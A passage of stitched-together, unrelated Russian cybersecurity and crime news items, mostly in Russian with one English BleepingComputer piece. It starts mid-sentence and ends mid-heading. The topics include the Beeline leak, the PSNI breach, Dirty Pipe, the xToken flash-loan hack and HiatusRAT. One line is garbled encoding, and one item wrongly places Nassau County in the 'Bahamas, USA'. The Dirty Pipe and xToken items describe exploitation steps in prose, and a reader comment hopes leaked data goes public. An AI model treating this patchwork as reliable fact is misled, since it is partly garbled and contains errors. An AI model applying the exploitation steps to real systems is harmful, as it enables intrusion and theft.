открытый Elasticsearch-сервер с 27 августа до 13 сентября, говорится в
Telegram-канале «Утечки и информации» со ссылкой
на данные поисковика Shodan.
Открытый сервер содержит около 4,2 Тб данных, и, основываясь на предыдущем
опыте анализа похожих по формату систем, можно предположить, что
ориентировочно это от 1,5 млн до 2 млн уникальных записей с персональными
данными, рассказал “Ъ” основатель сервиса разведки утечек данных и мониторинга
даркнета DLBI Ашот Оганесян: «Это позволяет считать инцидент одной из
крупнейших утечек персональных данных в 2021 году». Общее число абонентов
домашнего интернета «Вымпелкома» во втором квартале составило 2,86 млн,
оценивал «ТМТ Консалтинг» (см. “Ъ” от 24
августа).
](https://www.kommersant.ru/doc/4986542)
ÐаннÑе клиенÑов домаÑнего инÑеÑнеÑа «ÐÑмпелкома» оказалиÑÑ Ð² Ñвободном доÑÑÑпе
www.kommersant.ru
«По факту утечки персональных данных клиентов сотового оператора «Билайн» Роскомнадзор направил соответствующий запрос в компанию «ВымпелКом» с требованием предоставить детальную информацию об инциденте», — говорится в сообщении Роскомнадзора. Там напомнили об ответственности оператора и о том, что если подтвердится факт «невыполнения компанией «ВымпелКом» обязанностей по соблюдению сохранности персональных данных», ей может грозить штраф в размере до 100 тыс. руб.
Подробнее на РБК:
абонентов ](https://www.rbc.ru/technology_and_media/15/09/2021/6141a7db9a79470ed99ad5ff)
В ведомстве напомнили о возможном штрафе в размере 100 тыс. руб. в случае, если вина компании в утечке будет доказана. О компрометации данных клиентов сообщалось еще в начале сентября
www.rbc.ru
Вот так штраф 5 копеек за абонента.
Ждем базу в паблике.
Суд приговорил двух бывших менеджеров тайваньской «дочки» американской Micron к реальным тюремным срокам за выдачу конфиденциальной информации и коммерческой тайны конкурентам из Китая. Об этом сообщило издание United Daily News.
По данным источника, 49-летний Чжан Нань и 50-летний Фан Нань, которые занимали в принадлежащей Micron компании Taiwan Micron Wafer Company высокие управленческие позиции, проведут в заключении два и три года соответственно.
Кроме того, в настоящее время идет отдельный суд над еще троими работниками фабрики, также имеющих отношение к данному преступлению.
Micron Technology — американская корпорация, выпускающая полупроводниковую продукцию, в частности, чипы памяти DRAM и NAND и SSD-накопители.
Что произошло
Согласно выводам суда, тайванцы, прежде чем уволиться из компании в 2016 г., засняли с помощью камер личных смартфонов обстановку чистых помещений на производственной площадке фабрики. Твердые копии фото менеджеры отправили в компанию-конкурент – China Wafer Technology, расположенную в материковом Китае.
Кроме того, они выгрузили из информационной системы предприятия файлы, содержимое которых представляло коммерческую тайну. Сведения, в частности, касались технологий производства полупроводниковых пластин. Скачанные файлы затем были переданы через интернет специалистам все той же China Wafer.
Афера переходного периода
В 2016 г. Micron приобрела тайваньскую компанию Huaya Technology, которая специализировалась на контрактном производстве полупроводниковых изделий, в частности DRAM-памяти. После этого Huaya была переименована в Taiwan Micron Wafer.
Хитрые тайванские управленцы провернули свою аферу в переходный для предприятия период смены владельца, вероятно, рассчитывая воспользоваться неразберихой и избежать ответственности.
Как отмечает UDN, впоследствии «великолепная пятерка», включая Чжан Наня и Фан Наня, смогла в 2016 г. успешно трудоустроиться в China Wafer. Там они получали очень высокую по меркам страны заработную плату. Ежемесячный доход каждого из них суд оценил примерно в 200 тыс. юаней, что примерно равно 2,3 млн руб. или $31 тыс.
Вынося приговор, суд подчеркнул, что Чжан Нань и Фан Нань не только подорвали конкурентоспособность тайваньской «дочки» Micron на мировом рынке, но и негативно повлияли на состояние национальной отрасли высоких технологий.
Обычное дело для Китая
Китайских бизнес нередко обвиняют в хищении интеллектуальной собственности иностранных компаний. Промышленный шпионаж, в частности, является одним из ключевых противоречий в торговых переговорах между США и Китаем.
Ранее CNews писал о том, как пожилой бизнесмен и ученый из Калифорнийского университета Йи-Чи-Ши (Yi-Chi Shih) получил в США пять лет тюрьмы за контрабанду интегральных схем двойного назначения, необходимых для налаживания производства аналогов в Китае. Ему также предстоит выплатить около $660 тыс. в качестве штрафов и компенсаций.
Впрочем, можно сказать, что ученый отделался легким испугом, ведь первоначально по совокупности предъявленных обвинений ему грозило более 200 лет тюрьмы.
Самозванцы нередко предъявляют своим жертвам удостоверение на имя Арманда Рукса.
Мошенники, пытаясь вызвать к себе доверие, достаточно часто выдают себя за сотрудников правоохранительных органов. С целью выманить деньги преступники отправляют электронные письма и звонят, выдавая себя за главу Государственной полиции или одного из его заместителей.
В октябре в Рижское управление Госполиции поступило заявление от женщины пенсионного возраста, у которой украли 57 тысяч евро. В своих показаниях потерпевшая утверждает, что сначала ей позвонила женщина, назвавшаяся сотрудницей службы безопасности банка. Звонившая сообщила, что некто неизвестный пытался снять деньги со счета женщины и скоро в связи с этим ей позвонит начальник полиции Арманд Рукс.
Через некоторое время женщине позвонил другой самозванец, которые представился как глава Госполиции. Он утверждал, что в целях безопасности дама должна снять все деньги с банковских счетов. К общению преступники подключили и мужа женщины. По указанию мошенника женщина и ее супруг сняли со своих счетов 57 тысяч евро и передали наличные неизвестному человеку.
В связи с инцидентом Государственная полиция возбудила уголовный процесс, выясняются точные обстоятельства происшествия.
Почти через 4 недели после того, как Полицией Северной Ирландии (PSNI) были случайно опубликованы данные 10 000 сотрудников, еще двое мужчин в возрасте 21 и 22 года были освобождены под залог. Они были арестованы 2 сентября в рамках расследования этой утечки данных. Информацию об утечке подтвердила PSNI.
Полиция продолжает работать над установлением лиц, имеющих информацию об утечке данных. 8 августа PSNI случайно опубликовала таблицу с данными всех действующих полицейских Северной Ирландии в ответ на запрос о предоставлении информации по закону о свободе информации . В утечке оказались фамилии и инициалы сотрудников, их звания, места работы и отделы. Хотя информация была удалена через несколько часов после публикации, это могло подвергнуть риску безопасность сотрудников, учитывая политическую обстановку в регионе.
Всего по данному делу произведено 4 ареста. 16 августа был арестован 39-летний мужчина, подозреваемый в сборе информации, которая может быть полезна террористам. Он был освобожден под залог. Через 2 дня 50-летний мужчина был арестован и обвинен по статьям закона о терроризме.
Утечка данных PSNI особенно опасна из-за потенциальной угрозы жизни полицейских офицеров в Северной Ирландии. В утечке были раскрыты имена офицеров, работающих в портах и аэропортах, телохранителей, судей и даже сотрудников MI5. Как действующие, так и недавно ушедшие в отставку офицеры говорят, что они сталкиваются с постоянной угрозой со стороны военизированных формирований, причем некоторые из них вскоре после взлома «всегда оглядываются через плечо».
Главный констебль PSNI (руководитель) Саймон Бирн назвал произошедшее «беспрецедентным кризисом» и извинился за «утечку данных промышленного масштаба». Ситуация усугубилась, когда республиканские диссиденты заявили, что у них есть часть утекшей информации. В связи с этим PSNI начала рассматривать вопрос о переводе некоторых полицейских на другие рабочие места.
Отметим, что Саймон Бирн подал в отставку после того, как проиграл голосование по вопросу о доверии. Отставка Бирна произошла несмотря на то, что ему было продлено трудовое соглашение на 3 года. Утечка данных в PSNI стала серьезным испытанием для правоохранительных органов и политической стабильности в регионе, подняв вопросы о безопасности сотрудников и необходимости ужесточения мер по защите персональных данных.
source: gov.uk/government/speeches/secretary-of-states-speech-psni-data-breach
Датамайнер CS:GO под ником Aquarius обнаружил серьезный дефект в коде:
«Есть эксплойт, специфичный именно для соревновательного режима. Он позволяет
видеть IP-адреса всех игроков в матче».
Энтузиаст связался с разработчиками и опубликовал скриншот переписки. В ней представители Valve подтверждают, что знают об этой проблеме и расследование уже ведется.
Пока точно не известно, как именно работает эксплойт и как он позволяет
узнавать конфиденциальную информацию о других игроках. Но сам факт его
существования вызывает опасения, ведь онлайн-режим выбирают подавляющее
большинство из многомиллионной аудитории CS:GO.
Пока Valve не выпустит фикс, специалисты рекомендуют полностью воздержаться от
коллективных матчей. Это позволит обезопасить свои данные.
source: https://www.securitylab.ru/news/540868.php
Злоумышленники всё чаще используют метод, называемый управлением версиями, чтобы избежать обнаружения вредоносных программ в Google Play и добраться-таки до ничего не подозревающих пользователей Android.
«Кампании, использующие управление версиями, обычно нацелены на учётные и персональные данные пользователей, а также на их финансы», — говорится в недавнем отчёте Google Cybersecurity Action Team (GCAT).
Хотя управление версиями не является новой техникой, она довольна коварна, так её крайне трудно обнаружить. Для эксплуатации данного метода Android- разработчик сначала выкладывает в Play Market безобидную версию приложения, которая с лёгкостью проходит все необходимые проверки Google. Однако позже эта версия обновляется и получает вредоносный компонент с сервера злоумышленников, фактически превращая приложение в бэкдор.
Так, в мае этого года мы сообщали о вредоносном приложении «iRecorder», которое оставалось безвредным почти год после публикации в Play Market. А затем в нём тайно появились вредоносные изменения для шпионажа за пользователями.
Другой пример — знаменитый банковский троян SharkBot, неоднократно проникавший в Play Market под видом антивирусов и различных системных утилит. SharkBot инициировал несанкционированные денежные переводы со скомпрометированных устройств, тем самым бессовестно обкрадывая своих жертв.
«Угроза управления версиями демонстрирует необходимость применения принципов глубокой защиты для корпоративных клиентов, включая, помимо прочего, ограничение источников установки приложений только надёжными источниками, такими как Google Play, или управление корпоративными устройствами с помощью платформы управления мобильными устройствами», — заявили в Google.
«У злоумышленников может быть сразу несколько приложений, опубликованных в Google Play одновременно под разными учётными записями разработчиков, однако только одно будет действовать как вредоносное. А когда его заметят и удалят, на смену придёт резервная копия с другого аккаунта», — отметила в июне этого года голландская компания ThreatFabric.
По мнению экспертов, пользователям стоит проявлять бдительность и осторожность при установке обновлений, так как они могут превратить ранее безопасное приложение в бэкдор для злоумышленников.
Для снижения рисков рекомендуется вообще не загружать малоизвестные приложения от сомнительных издателей, чтобы исключить риск, что в будущем они превратятся в троян. А если уж очень нужно, то сначала необходимо внимательно изучить последние отзывы, а лишь затем устанавливать.
Кроме того, обязательно убедитесь, что функция Google Play Protect активна на устройстве, ведь с большей долей вероятности она зафиксирует вредоносное содержимое.
Хакеры могут получить доступ к вашим данным, просто изменив URL в браузере.
Веб-приложения подвержены угрозе кибератак из-за уязвимостей в системе контроля доступа, предупреждают агентства безопасности Австралии и США. В совместном заявлении они указывают на опасность так называемых уязвимостей IDOR (Insecure Direct Object Reference), которые позволяют злоумышленникам получать несанкционированный доступ к чужим данным, изменять или удалять их.
Уязвимости IDOR возникают, когда веб-приложение использует входные данные пользователя или идентификатор для прямого доступа к внутреннему ресурсу, например, записи в базе данных, без дополнительных проверок. Типичный пример уязвимости IDOR - это возможность пользователя легко изменить URL (например, https://example[.]site/details.php?id=12345 ) для получения запрещенных данных другой транзакции (то есть https://example[.]site/details.php?id=67890) .
“Уязвимости IDOR - это уязвимости контроля доступа, позволяющие злоумышленникам изменять или удалять данные или получать доступ к конфиденциальным данным, отправляя запросы на веб-сайт или веб-приложение программного интерфейса (API), указывая идентификатор пользователя других, действительных пользователей”, - говорится в заявлении. “Эти запросы успешны там, где отсутствует достаточная проверка подлинности и авторизации”.
Авторы заявления - Австралийский центр кибербезопасности (ACSC) Австралийское управления связи, Агентство США по кибербезопасности и безопасности инфраструктуры (CISA) и Агентство национальной безопасности США (АНБ) — отметили, что злоумышленники злоупотребляют такими недостатками для компрометации личных данных, финансовой и медицинской информации миллионов пользователей и потребителей.
Для предотвращения угроз рекомендуется, чтобы поставщики, дизайнеры и разработчики принимали принципы "врожденной защищенности" (Security-by-Design and -Default), чтобы программное обеспечение выполняло проверки подлинности и авторизации для каждого запроса, который изменяет, удаляет и получает доступ к чувствительным данным.
Это заявление было сделано вскоре после того, как CISA опубликовало свой анализ данных, собранных из оценок рисков и уязвимостей (RVAs), проведенных в нескольких федеральных гражданских исполнительных органах (FCEB), а также в приоритетных частных и общественных операторах критической инфраструктуры.
Исследование показало, что “Действительные аккаунты были самой распространенной успешной техникой атаки, ответственной за 54% успешных попыток”, за которыми следовали ссылки целевого фишинга (33.8%), вложения целевого фишинг(3.3%) и внешние удаленные сервисы (2.9%) .
Действительные аккаунты, которые могут быть как бывшими аккаунтами сотрудников, которые не были удалены из активного каталога, так и аккаунтами администратора по умолчанию, также стали основным вектором для установления постоянства в скомпрометированной сети (56.1%), эскалации привилегий (42.9%) и обхода защиты (17.5%).
“Чтобы защититься от успешной техники действительных аккаунтов, субъекты критической инфраструктуры должны внедрять строгие политики паролей, такие как устойчивая к фишингу [многофакторная аутентификация], и контролировать журналы доступа и журналы связи в сети, чтобы обнаруживать необычный доступ”, - говорит CISA.
Срок давности по преступлению, которое США вменяют задержанному в Алма-Ате по их запросу гражданину России, уже истек, поэтому Россия надеется на возвращение соотечественника на родину, сообщил консул-советник генерального консульства РФ в Алма-Ате Артем Оганов.
"По информации его (Кислицина - ред.) адвокатов, уголовно-процессуальный кодекс Республики Казахстан предполагает, что выдача может состояться только в том случае, если по какому-либо преступлению, совершенному за рубежом, не истек срок давности. Американцы вменяют ему эпизод 2011 года, по которому, согласно казахстанским законам, срок действия уже прошел. Поэтому мы надеемся на правильное и правовое разрешение этого вопроса и возвращение нашего гражданина на родину", - сказал дипломат на брифинге.
Двое жителей округа Нассау (Багамские острова, США) подозреваются в том, что годами обманывали государство, получая различные пособия, на которые они не имели права. Издание Patch уточняет что обвиняемые — 55-летний Маркус Эффингер (Markus Effinger) и его 58-летняя возлюбленная Глория Севилья (Gloria Sevilla).
«Миллионы людей ежедневно полагаются на систему социального и пенсионного обеспечения, чтобы свести концы с концами, — пожурила обвиняемых окружной прокурор округа Нассау Энн Доннелли (Anne Donnelly). — Эти люди воспользовались системой, предназначенной для защиты наиболее уязвимых слоев населения от финансового стресса, и украли десятки тысяч долларов пособий, на которые они не имели права».
Первое липовое пособие Эффингер получил еще в мае 2012 года. Тогда он оформил себе инвалидность, связанную с отслоением сетчатки глаза. Спустя три года, уже сообща с Севильей, он создал компанию Dash Xpress, которая показывала миллионный оборот, но Эффингер не сообщил об этом властям, чтобы и дальше рассчитывать на пособия. Севилья параллельно с 2015 года получала социальные выплаты за умершую женщину, над которой она ранее оформила опекунство.
Сумма незаконных выплат за десяток лет достигла примерно 200 тысяч долларов. Оба подследственных не признали свою вину, суда они дожидаются на свободе.
source: patch.com/new-york/fivetowns/2-nassau-residents-indicted-200k-social- security-fraud-nassau-da
Десять человек арестованы в Сингапуре по обвинениям в отмывании крупных сумм денег, сообщают западные СМИ.
Согласно сообщениям сингапурской полиции, арестованные - люди в возрасте от 31 до 44 лет, все они имеют иностранные паспорта - Китая, Камбоджи, Турции и Вануату.
В рамках операции изъято около 1 млрд сингапурских долларов ($735 млн), наложен арест на 94 объекта недвижимости и на около 50 автомобилей класса люкс.
В сингапурской полиции отметили, что участники этой криминальной группы отмывали деньги, полученные в результате мошеннических действий за рубежами Сингапура и работы онлайн-казино.
Отмечается, что такие рейды - редкость для Сингапура, где уровень преступности находится на одной из самых низких позиций в мировых рейтингах.
В компании считают, что это нарушение политики конфиденциальности и законов Сингапура, где расположены сервера Telegram.
Верховный суд Дели обязал Telegram раскрыть данные о каналах, которые распространяют нарушающие авторские права материалы, сообщает TechCrunch.
Представители Telegram в свою очередь заявили, что подобное требование нарушает политику конфиденциальности сервиса и законодательство Сингапура, на чьей территории находятся серверы мессенджера.
В сообщении говорится, что иск подала индийская учительница, которая утверждает, что в каналах мессенджера распространяются ее лекции и книги по различным дисциплинам по сниженным ценам. Несмотря на аргументы Telegram, суд не принял их и отметил, что владельцы авторских прав не могут остаться «полностью без средств правовой защиты в отношении фактических нарушителей».
Как отмечается, количество пользователей сервиса в Индии достигает 700 млн человек.
source: techcrunch.com/2022/09/01/indian-court-orders-telegram-disclose- channel-details-violating-copyright-law
Ущерб оценили в 2 млрд 800 млн рублей
Следователи в Татарстане завершили предварительное расследование уголовного
дела в отношении троих руководителей межрегиональной финансовой пирамиды,
деятельность которой причинила ущерб в размере более 2,8 млрд рублей. Об этом
ТАСС во вторник сообщила официальный представитель МВД России Ирина Волк.
"Следователем Главного следственного управления МВД по Республике Татарстан
окончено предварительное расследование уголовного дела в отношении
руководителей организаций, которые работали по принципу финансовой пирамиды.
Трое жителей Набережных Челнов обвиняются в мошенничестве, совершенном в особо
крупном размере, а также в легализации криминальных доходов", - сказала она.
По словам Волк, потерпевшими признаны 7 260 человек, сумма ущерба превысила 2
млрд 800 млн рублей.
По версии следствия, злоумышленники с 2012 по 2014 год создали несколько коммерческих организаций, которые занимались выдачей микрокредитов и привлечением средств граждан в качестве инвестиций. Филиалы организаций были открыты в 20 регионах России. Инвесторам обещали ежегодные выплаты в размере от 120 до 180% от суммы вклада. Высокую доходность объясняли успешной деятельностью в сфере кредитования.
"Для сотрудников компаний была разработана система поощрения за сохранение старых клиентов и привлечение новых. В результате, однократно получив заявленный в рекламе доход, граждане продлевали действие договоров вклада и оставляли свои деньги в организации. После того как количество желавших сделать выгодное вложение стало исчисляться тысячами, выплаты прекратились", - добавила представитель ведомства.
Фигуранты долго скрывались за границей. В 2015-2016 году они были задержаны на территории РФ и арестованы. Им предъявлено обвинение по статьям о мошенничестве и легализации денег в результате совершения преступления (ст. 159 и 174.1 УК РФ). В настоящее время уголовное дело с обвинительным заключением, объем которого составил 1 961 том, направлено в Набережночелнинский городской суд для рассмотрения по существу.
Источник ТАСС в правоохранительных органах уточнил, что речь идет об ООО "Руссинвестгрупп".
В ядре Linux [выявлена](https://www.openwall.com/lists/oss- security/2022/03/07/1) уязвимость ([CVE-2022-0847](https://security- tracker.debian.org/tracker/CVE-2022-0847)), позволяющая перезаписать содержимое страничного кэша для любых файлов, в том числе находящихся в режиме только для чтения, открытых с флагом O_RDONLY или размещённых в файловых системах, примонтированных в режиме только для чтения. С практической стороны, уязвимость может применяться для подстановки кода в произвольные процессы или искажения данных в открываемых файлах. Например, можно изменить содержимое файла authorized_keys для процесса sshd. Для тестирования доступен прототип эксплоита.
Проблеме присвоено кодовое имя Dirty Pipe, по аналогии с выявленной в 2016 году критической уязвимостью Dirty COW. Отмечается, что по уровню опасности Dirty Pipe находится на одном уровне с Dirty COW, но значительно проще в эксплутации. Уязвимость была выявлена в ходе разбора жалоб о периодическом повреждении загружаемых по сети файлов в системе, загружающей сжатые архивы с log-сервера (37 повреждений за 3 месяца на нагруженной системе), при подготовке которых использовалась операция splice() и неименнованные каналы.
Уязвимость проявляется начиная с ядра Linux 5.8, выпущенного в августе 2020 года, т.е. присутствует в Debian 11, но не затрагивает базовое ядро в Ubuntu 20.04 LTS. Ядра RHEL 8.x и openSUSE/SUSE 15 изначально основаны на старых ветках, но не исключено, что вызывавшее проблему изменение было бэкпоритировано в них (точных данных пока нет).
Исправление уязвимости предложено в выпусках 5.16.11, 5.15.25 и 5.10.102. Исправление также включено в ядро, используемое в платформе Android.
Уязвимость вызвана отсутствием инициализации значения "buf->flags" в коде функций copy_page_to_iter_pipe() и push_pipe(), при том, что память при выделении структуры не очищается и при определённых манипуляциях с неименованными каналами в "buf->flags" может оказаться значение от другой операции. Используя данную особенность непривилегированный локальный пользователь может добиться появления во флаге значения PIPE_BUF_FLAG_CAN_MERGE, которое позволяет организовать перезапись данных в страничном кэше через простую запись новых данных в специально подготовленный неименованный канал (pipe).
Для атаки целевой файл должен быть доступен на чтение, при этом так как при записи в pipe не проверяются права доступа замена в страничном кэше может быть произведена в том числе и для файлов, находящихся в разделах, примонтированных только для чтения (например, для файлов c CD-ROM). После замены информации в страничном кэше процесс при чтении данных из файла получит не фактические, а подменённые данные.
Эксплуатация сводится к созданию неименованного канала и наполнению его произвольными данными для того, чтобы добиться выставления флага PIPE_BUF_FLAG_CAN_MERGE во всех связанных с ним кольцевых структурах. Далее данные читаются из канала, но флаг остаётся выставленных во всех экземплярах структуры pipe_buffer в кольцевых структурах pipe_inode_info. Затем выполняется вызов splice() для чтения данных из целевого файла в неименованный канал, начиная с требуемого смещения. При записи данных в этот неименованный канал из-за выставленного флага PIPE_BUF_FLAG_CAN_MERGE данные в страничном кэше будут перезаписаны, вместо создания нового экземпляра структуры pipe_buffer.
Проект децентрализованных финансов xToken был взломан уже второй раз за год. Злоумышленники обнаружили уязвимость в смарт-контракте xSNX и вывели токены на $4.5 млн.
Продукт xSNX проекта xToken позволяет пользователям получить доступ к активам на базе Synthetix без необходимости взаимодействия со сложными смарт- контрактами платформы. После взлома разработчики xToken заявили, что уберут доступ к продукту xSNX.
Для осуществления взлома злоумышленник взял мгновенный займ на децентрализованной бирже dYdX в размере 25 000 ETH ($81 млн) и использовал эти средства в качестве обеспечения для получения 1.5 млн токенов SNX через протоколы Aave и Bancor.
Токены были обменены на 6.5 млн USDC через децентрализованную биржу Kyber, что оказало мощное давление на курс SNX. Затем злоумышленник обменял UDSC на токены sUSD на базе Synthetix, которые и были использованы для покупки 614 000 SNX в пуле xToken за 811 000 sUSD. Таким образом, хакер получил токены SNX на сумму более $7 млн.
Команда xToken заявила, что аналогичных уязвимостей в других продуктах платформы не обнаружено. Контракты xSNX являются наиболее сложными на платформе, и в текущей реализации продукта слишком много зависимостей, что дает базу для различных уязвимостей. Поэтому было решено закрыть данный продукт.
«Каждый день мы будем посвящать тому, чтобы восстановить доверие сообщества к нашей платформе», – подчеркнули разработчики.
Напомним, что в мае этого года протокол xToken был взломан похожим образом. С помощью быстрых займов хакеры смогли вывести из проекта различные токены на общую сумму $24.5 млн.
Следственными органами Следственного комитета Российской Федерации по Костромской области возбуждено уголовное дело в отношении 28-летнего жителя города Костромы, подозреваемого в совершении преступления, предусмотренного ч. 1 ст. 273 УК РФ (распространение компьютерных программ, иной компьютерной информации, заведомо предназначенных для несанкционированного модификации компьютерной информации, нейтрализации средств защиты компьютерной информации – 2 эпизода).
По версии следствия, подозреваемый оказывал услуги по внесению изменений в программное обеспечение USB-модемов для снятия ограничения Интернет-трафика, предусмотренного тарифами провайдера, чем причинил материальный ущерб оператору сотовой связи. Кроме того, установлено, что использованные компьютерные программы относятся к категории вредоносных и предназначены для нейтрализации средств защиты информационных систем оператора сотовой связи.
Факты противоправной деятельности подозреваемого были выявлены в ходе совместной работы следователей СУ СК России по Костромской области, сотрудников УФСБ России по Костромской области и УМВД России по Костромской области.
В настоящее время по уголовному делу проводятся следственные и иные процессуальные действия, направленные на установление всех обстоятельств произошедшего. Следователем назначены необходимые судебные экспертизы, при оперативном сопровождении сотрудников органов внутренних дел проведены обыски.
Расследование уголовного дела продолжается.
В США компания Mandiant обвинила "русских" хакеров в попытке хищения данных.
Американская компания Mandiant обвинила "связанных с российскими спецслужбами" хакеров в том, что они могут продолжать попытки хищения данных, связанных с интересами Москвы.
В докладе Mandiant — обнаружившая прошлогодний взлом SolarWinds — отмечает, что стопроцентной уверенности в правдивости этих утверждений нет. Однако, считает компания, как минимум за частью обнаруженной активности стоит хакерское сообщество, подозреваемое в работе на Службу внешней разведки России.
"Mandiant подозревает, что многочисленные кластеры (хакерской активности) связаны с общей российской угрозой — угрожающим актором, которого Mandiant называет UNC2452, а Microsoft — Nobelium", — говорится в документе.
Утверждается, что в некоторых случаях данные похищали прежде всего для
создания новых маршрутов доступа к сетям других жертв.
Год назад власти США обвинили российских хакеров в атаке на американские
правительственные учреждения и частные структуры с помощью уязвимости в
обновлениях программного обеспечения разработки компании SolarWinds.
Россия не раз опровергала подобные обвинения, за которыми, несмотря на это, часто следовали американские санкции. Москва, напротив, ведет с США диалог по информационной безопасности. Владимир Путин подчеркивал, что большинство кибератак в мире совершается из Соединенных Штатов, "на втором месте Канада, затем две латиноамериканские страны и потом Великобритания". России в этом списке нет и подобные инсинуации надо отбросить, указывал он.
source: ria.ru/20211206/khakery-1762472217.html
Джеймс Боттомли ([James Bottomley](https://researcher.draco.res.ibm.com/researcher/view.php?person=us- jejb)) из подразделения IBM Research, сопровождающий подсистемы SCSI и PA-RISC в ядре Linux и ранее возглавлявший технический комитет Linux Foundation, [предложил вариант](https://blog.hansenpartnership.com/solving-the-looming- developer-liability-problem/) решения проблемы с возможным привлечением к ответственности разработчиков открытого кода за ошибки в коде или ненадлежащее устранение уязвимостей.
Идея заключается в том, чтобы переложить юридическую ответственность за ошибки в исходном коде с разработчиков открытых проектов на поставщиков конечных коммерческих продуктов на основе этого кода, т.е. сместить ответственность с того, кто разрабатывает код на того, кто зарабатывает на этом коде. Например, если компания использует сторонний открытый код в своём продукте и ошибка/уязвимость в этом коде привела к нанесению ущерба пользователю, то отвечать в такой ситуации и возмещать ущерб должен производитель переданного пользователю коммерческого программного продукта, а не разработчик открытой библиотеки.
Перекладывание ответственности предлагается реализовать через прикрепление к лицензии пункта, указывающего на согласие возмещать убытки и защищать участников разработки от любых юридических претензий в случае полного или частичного использования предоставляемого под данной лицензией исходного кода в качестве компонента или продукта в юрисдикциях, накладывающих дополнительные обязательства по сопровождению программных продуктов.
В нынешней практике для снятия с себя юридических рисков достаточно наличия в лицензии предупреждения "AS IS", в котором заявлено, что разработчик не несёт ответственности за ошибки, не даёт никаких гарантий на работоспособность кода и не принимает обязательств по решению проблем, а потребитель соглашается использовать код на свой страх и риск. Отсутствие гарантий от разработчиков стимулировало развитие бизнес-модели на основе платной технической поддержки, которая доминировала на раннем этапе становления экосистемы СПО.
По мере проникновения открытого кода в индустрию и роста интереса корпораций к его использованию стала развиваться концепция влияния на разработку через некоммерческие фонды - на базе крупного проекта создаётся фонд, получающий финансирование на разработку от крупных компаний, которым в ответ предоставляется возможность вхождения в надзорный технический совет и участия в принятии коллегиальных решений о дальнейшем развитии. Появление фондов преобразило отношение к отрытым проектам, которые стали восприниматься как инструмент развития технологической индустрии, а не беспорядочное пристанище добровольцев. Изменилось и восприятие ответственности за проблемы в открытом коде - вместо защиты отдельных разработчиков, пункт об отсутствии обязательств стал восприниматься как возможность ухода от ответственности крупных компаний, создающих открытые продукты.
Ситуация с отказом от обязательств может измениться в случае принятия в Евросоюзе законопроекта Cyber Resilience Act, который накладывает определённую ответственность на производителей программного обеспечения, должным образом не заботящихся о безопасности и оперативно не устраняющих уязвимости на протяжении жизненного цикла продукта. Законопроект затрагивает производителей коммерческого ПО и, судя по проводимой работе, предоставит специальное исключение для ПО под открытыми лицензиями, но нет никаких гарантий, что в будущем где-то не будет принят похожий закон без подобных исключений.
В качестве примера рисков, связанных с ответственностью разработчиков, также упоминается инициированное в Великобритании судебное разбирательство, в ходе которого компания Tulip Trading, потерявшая в ходе взлома биткойны на сумму около 4 млрд долларов, требует от разработчиков системы Bitcoin внести изменения в код блокчейна для возвращения потерянной суммы. Иск подан против разработчиков кода инструментария, а не операторов сети Bitcoin. Суд первой инстанции отказал удовлетворить иск на основании пункта в лицензии об отказе от ответственности, но разбор был продолжен в апелляционном суде, который, судя по всему, также отклонит иск, но на этот раз из-за неспособности компании Tulip Trading доказать владение биткойнами на заявленную сумму.
The FBI warned today that new HiatusRAT malware attacks are now scanning for and infecting vulnerable web cameras and DVRs that are exposed online.
As a private industry notification (PIN) published on Monday explains, the attackers focus their attacks on Chinese-branded devices that are still waiting for security patches or have already reached the end of life.
"In March 2024, HiatusRAT actors conducted a scanning campaign targeting Internet of Things (IoT) devices in the US, Australia, Canada, New Zealand, and the United Kingdom," the FBI said. "The actors scanned web cameras and DVRs for vulnerabilities including CVE-2017-7921, CVE-2018-9995, CVE-2020-25078, CVE-2021-33044, CVE-2021-36260, and weak vendor-supplied passwords."
The threat actors predominantly target Hikvision and Xiongmai devices with
telnet access using Ingram, an open-source web camera vulnerability scanning
tool, and Medusa, an open-source authentication brute-force tool.
Their attacks targeted web cameras and DVRs with the 23, 26, 554, 2323, 567,
5523, 8080, 9530, and 56575 TCP ports exposed to Internet access.
The FBI advised network defenders to limit the use of the devices mentioned in today's PIN and/or isolate them from the rest of their networks to block breach and lateral movement attempts following successful HiatusRAT malware attacks. It is also encouraged system administrators and cybersecurity professionals to send suspected indications of compromise (IOC) to the FBI's Internet Crime Complaint Center or their local FBI field office.
This campaign follows two other series of attacks: one that also targeted a Defense Department server in a reconnaissance attack and an earlier wave of attacks in which more than a hundred businesses from North America, Europe, and South America had their DrayTek Vigor VPN routers infected with HiatusRAT to create a covert proxy network.
Lumen, the cybersecurity company that first spotted HiatusRAT, said this
malware is mainly used to deploy additional payloads on infected devices,
converting the compromised systems into SOCKS5 proxies for command-and-control
server communication.
HiatusRAT's shift in targeting preference and information gathering aligns
with Chinese strategic interests, a link also highlighted in the Office of the
Director of National Intelligence's 2023 annual threat assessment.
https://www.bleepingcomputer[.]com/...t-malware-attacks-targeting-web-cameras- dvrs/
Мошенники попытались получить персональные данные сотрудников CNews, прислав в редакцию поддельный документ о возбуждении в отношении редакции уголовного дела в связи «очередным влиянием иностранных спецслужб». Эксперты по информационной безопасности называют это распространенной схемой мошенничества с целью получить персональные данные.
Как мошенники под видом ФСБ обратились в редакцию CNews
Нескольким сотрудникам CNews через мессенджер Telegram пришел документ о том, что Федеральная служба безопасности (ФСБ) якобы возбудила уголовное дело в отношении редакции. Отправителем выступил пользователь, представившийся гендиректором ООО «Синьюз», но им не являвшийся. Сообщение начиналось со слов: «Узнали ? Я по делу, буквально на пару слов. У нас проверка намечается в связи с утечкой данных сотрудников организации».
Документ имел собственноручную и электронную подпись, якобы принадлежащие «первому замдиректора ФСБ, генералу Королеву Сергею Борисовичу». Также в документе была пометка о том, что он был передан по «зашифрованным каналам».
Из документа следовало, что ФСБ якобы проводит проверку в отношении ООО «Синьюс», причиной которой стало выявление инцидентов, связанных с утечкой персональных данных и подозрением в раскрытии государственной тайны, а также в связи с «очередным влиянием иностранных спецслужб».
ФСБ якобы намерено выявить причины утечки информации из «архива учреждения» и «изучить возможное вмешательство иностранных спецслужб на должных лиц, имеющим доступ к архивам данных».
Согласно документу, в связи с указанными нарушениями в отношении ООО «Синьюс» якобы было возбуждено уголовное дело, а в отношении должностных лиц ООО «Синьюс» якобы ведется «закрытое расследование» - они будут привлечены к ответственности по статье 275 Уголовного кодекса («Государственная измена»), а также в соответствие с законами №63 («Об электронной подписи») и 5485-1 («О государственной тайне»). В письме также был список должностных лиц ООО «Синьюс», в отношении которых якобы проводится проверка.
Пресс-служба ФСБ к моменту публикации этого материала не ответила на запрос CNews по данному вопросу.
«Десять признаков подделки»
